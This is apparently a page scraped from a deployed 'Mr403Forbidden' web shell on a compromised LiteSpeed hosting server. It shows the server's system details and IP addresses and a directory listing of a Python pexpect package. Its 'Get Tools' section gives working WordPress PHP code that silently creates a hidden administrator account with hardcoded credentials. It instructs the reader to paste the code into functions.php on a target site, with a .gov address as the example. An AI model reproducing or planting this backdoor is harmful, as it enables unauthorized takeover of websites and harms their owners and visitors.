./Mr403Forbidden

:/usr/lib/python3.6/site-packages/pexpect/ [ s--------- ]

System: Linux myhosting.zubahost.com 4.18.0-553.51.1.lve.1.el8.x86_64 #1 SMP Wed May 14 14:34:57 UTC 2025 x86_64
Software: LiteSpeed
PHP Version: 7.4.33 PHP Os: Linux
Server IP: 194.163.174.55
Your IP: 216.73.216.138
User: business1 (1088) | Group: business1 (1091)
Safe Mode: OFF
MYSQL: OFF | PERL: ON | PYTHON: OFF | WGET: ON | CURL: ON | GCC: ON | PKEXEC: OFF
Disable Function:
mail

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = 'mr403forbidden@hotmail.com';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
__pycache__ dir 2024-01-26 6:56 - root/root s---------
ANSI.py file 2019-12-17 19:35 11.89 KB root/root s---------
FSM.py file 2019-12-17 19:35 13.11 KB root/root s---------
__init__.py file 2019-12-17 19:35 3.81 KB root/root s---------
_async.py file 2019-12-17 19:35 2.56 KB root/root s---------
bashrc.sh file 2017-12-12 10:47 380 B root/root s---------
exceptions.py file 2019-12-17 19:35 1.04 KB root/root s---------
expect.py file 2019-12-17 19:35 10.36 KB root/root s---------
fdpexpect.py file 2019-12-17 19:35 5.49 KB root/root s---------
popen_spawn.py file 2019-12-17 19:35 5.53 KB root/root s---------
pty_spawn.py file 2019-12-17 19:35 34.27 KB root/root s---------
pxssh.py file 2019-12-17 19:35 18.44 KB root/root s---------
replwrap.py file 2019-12-17 19:35 5.05 KB root/root s---------
run.py file 2019-12-17 19:35 6.48 KB root/root s---------
screen.py file 2019-12-17 19:35 13.39 KB root/root s---------
spawnbase.py file 2019-12-17 19:35 20.16 KB root/root s---------
utils.py file 2019-12-17 19:35 4.83 KB root/root s---------

© ./Mr403Forbidden